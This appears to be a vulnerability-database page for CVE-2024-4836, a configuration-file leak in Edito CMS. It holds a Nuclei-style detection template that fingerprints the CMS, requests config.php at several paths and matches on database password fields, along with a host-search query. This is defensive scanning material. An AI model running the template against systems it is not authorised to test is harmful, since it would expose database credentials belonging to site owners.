| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2024-4836 | 2 Jul 202417:20 | – | circl | |
| Edito CMS Security Vulnerability | 2 Jul 202400:00 | – | cnnvd | |
| CVE-2024-4836 | 2 Jul 202408:44 | – | cve | |
| CVE-2024-4836 LFI in sites managed by Edito CMS | 2 Jul 202408:44 | – | cvelist | |
| CVE-2024-4836 | 2 Jul 202409:15 | – | nvd | |
| PT-2024-33090 · Edito Cms · Edito Cms | 2 Jul 202400:00 | – | ptsecurity | |
| CVE-2024-4836 LFI in sites managed by Edito CMS | 2 Jul 202408:44 | – | vulnrichment |
id: CVE-2024-4836
info:
name: Edito CMS - Sensitive Data Leak
author: s4e-io
severity: high
description: |
Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
impact: |
Unauthenticated attackers can download configuration files containing sensitive credentials from Edito CMS installations.
remediation: |
Update Edito CMS to a version later than 3.25 that secures configuration file access.
reference:
- https://cert.pl/en/posts/2024/07/CVE-2024-4836/
- https://github.com/sleep46/CVE-2024-4836_Check
- https://nvd.nist.gov/vuln/detail/CVE-2024-4836
classification:
epss-score: 0.02629
epss-percentile: 0.83644
metadata:
max-request: 5
fofa-query: icon_hash="1491301339"
tags: cve,cve2024,cms,edito,info-leak,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains_any(body,"content=\"edito", "www.edito.pl")'
- "status_code==200"
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/config.php"
- "{{BaseURL}}/config/config.php"
- "{{BaseURL}}/include/config.php"
- "{{BaseURL}}/includes/config.php"
matchers:
- type: dsl
dsl:
- 'contains_all(body,"db_password", "db_username")'
- "status_code==200"
condition: and
# digest: 4a0a00473045022015b5e3836da778e68b32b19d362354ec912c9bd489808b40cfa89ddced737ea2022100c7a59fb340c7df39299aa707328f1020224c3ad59b2e716dded37a0969aa0c62:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation